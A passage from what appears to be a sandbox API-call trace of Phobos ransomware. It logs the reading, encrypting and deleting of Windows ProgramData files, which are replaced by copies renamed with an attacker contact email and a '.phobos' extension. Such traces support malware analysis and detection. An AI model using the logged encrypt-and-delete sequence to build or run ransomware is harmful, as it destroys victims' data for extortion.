"c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0178.370] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0178.370] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.370] ReadFile (in: hFile=0x164, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x152, lpOverlapped=0x0) returned 1 [0178.370] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x160, dwBufLen=0x160 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x160) returned 1 [0178.370] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x160, lpOverlapped=0x0) returned 1 [0178.371] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0178.371] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.371] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0178.371] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.371] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0178.371] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.371] CloseHandle (hObject=0x164) returned 1 [0178.371] CloseHandle (hObject=0x130) returned 1 [0178.372] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn")) returned 1 [0178.372] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0178.372] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0178.373] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=362) returned 1 [0178.373] CloseHandle (hObject=0x130) returned 1 [0178.373] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn")) returned 0x2022 [0178.373] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.373] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0178.373] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.373] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.373] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0178.373] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0178.373] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.373] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x16a, lpOverlapped=0x0) returned 1 [0178.374] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x170, dwBufLen=0x170 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x170) returned 1 [0178.374] WriteFile (in: hFile=0x164, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x170, lpOverlapped=0x0) returned 1 [0178.375] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0178.375] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.375] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0178.375] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.375] WriteFile (in: hFile=0x164, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0178.375] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.375] CloseHandle (hObject=0x130) returned 1 [0178.375] CloseHandle (hObject=0x164) returned 1 [0178.375] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn")) returned 1 [0178.376] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0178.376] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0178.376] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=8668) returned 1 [0178.376] CloseHandle (hObject=0x164) returned 1 [0178.376] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl")) returned 0x2022 [0178.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.377] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0178.377] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.377] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.377] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0178.377] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0178.377] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.377] ReadFile (in: hFile=0x164, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x21dc, lpOverlapped=0x0) returned 1 [0178.412] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x21e0, dwBufLen=0x21e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x21e0) returned 1 [0178.412] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x21e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x21e0, lpOverlapped=0x0) returned 1 [0178.413] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0178.413] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.413] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0178.413] CryptDestroyKey (hKey=0xa327e8) returned 1 [0178.413] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0178.413] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.413] CloseHandle (hObject=0x164) returned 1 [0178.413] CloseHandle (hObject=0x130) returned 1 [0178.413] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl")) returned 1 [0178.414] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0178.414] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0178.416] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1034556) returned 1 [0178.416] CloseHandle (hObject=0x130) returned 1 [0178.416] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu")) returned 0x20 [0178.416] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.416] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0178.416] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.416] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0178.416] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0178.417] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0178.417] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0178.417] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xfc93c, lpOverlapped=0x0) returned 1 [0179.033] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xfc940, dwBufLen=0xfc940 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xfc940) returned 1 [0179.041] WriteFile (in: hFile=0x164, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xfc940, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xfc940, lpOverlapped=0x0) returned 1 [0179.215] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0179.215] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0179.215] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0179.215] CryptDestroyKey (hKey=0xa32c28) returned 1 [0179.215] WriteFile (in: hFile=0x164, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0179.215] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0179.215] CloseHandle (hObject=0x130) returned 1 [0179.215] CloseHandle (hObject=0x164) returned 1 [0179.215] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu")) returned 1 [0179.234] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0179.234] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0179.234] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=143360) returned 1 [0179.234] CloseHandle (hObject=0x194) returned 1 [0179.234] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 0x20 [0179.235] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.235] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0179.235] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0179.235] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0179.235] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0179.235] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32c68) returned 1 [0179.235] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0179.235] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x23000, lpOverlapped=0x0) returned 1 [0179.438] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x23010, dwBufLen=0x23010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x23010) returned 1 [0179.439] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x23010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x23010, lpOverlapped=0x0) returned 1 [0179.442] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0179.442] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0179.442] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0179.442] CryptDestroyKey (hKey=0xa32c28) returned 1 [0179.442] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0179.442] CryptDestroyKey (hKey=0xa32c68) returned 1 [0179.442] CloseHandle (hObject=0x194) returned 1 [0179.442] CloseHandle (hObject=0x134) returned 1 [0179.442] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 1 [0179.444] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0179.444] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.510] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=455720) returned 1 [0179.510] CloseHandle (hObject=0x178) returned 1 [0179.510] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe")) returned 0x20 [0179.510] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.510] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0179.510] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0179.510] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0179.510] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0179.536] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32aa8) returned 1 [0179.536] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0179.536] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x6f428, lpOverlapped=0x0) returned 1 [0179.599] 